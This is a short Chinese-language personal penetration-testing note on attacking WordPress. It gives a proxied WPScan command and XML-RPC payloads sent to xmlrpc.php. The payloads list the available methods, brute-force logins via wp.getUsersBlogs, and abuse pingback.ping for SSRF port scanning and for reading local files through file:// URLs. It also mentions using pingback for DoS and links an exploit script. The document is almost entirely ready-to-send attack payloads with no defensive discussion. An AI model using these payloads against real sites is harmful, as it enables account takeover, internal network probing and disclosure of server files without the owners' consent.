0x00 前言
个人笔记。
0x01 WPScan
Kali中自带:
1
| kali@kali:~$ wpscan --proxy protocol://ip:port --url http://a.com/
|
0x02 xmlrpc.php
探测方法
1 2 3 4
| <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>
|
暴破账号
1 2 3 4 5 6 7
| <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>password</value></param> </params> </methodCall>
|
SSRF
前提是WP版本 <= 3.5.1。如果高于该版本只能DNSLog验证,也能用于向其他机子发起DoS攻击。
1 2 3 4 5 6 7 8 9 10 11
| <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value><string>http://127.0.0.1:80</string></value> </param> <param> <value><string>http://localhost/wordpress/?p=1</string></value> </param> </params> </methodCall>
|
如果目标IP和端口存在,则响应包中的<value><int>
中的值大于0。
利用脚本:https://github.com/FireFart/WordpressPingbackPortScanner
除了端口扫描外,还能结合file://协议来读取本地文件:
1 2 3 4 5 6 7 8 9 10 11
| <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value><string>file:///var/log/apache2/access_log</string></value> </param> <param> <value><string>http://localhost/wordpress/?p=1</string></value> </param> </params> </methodCall>
|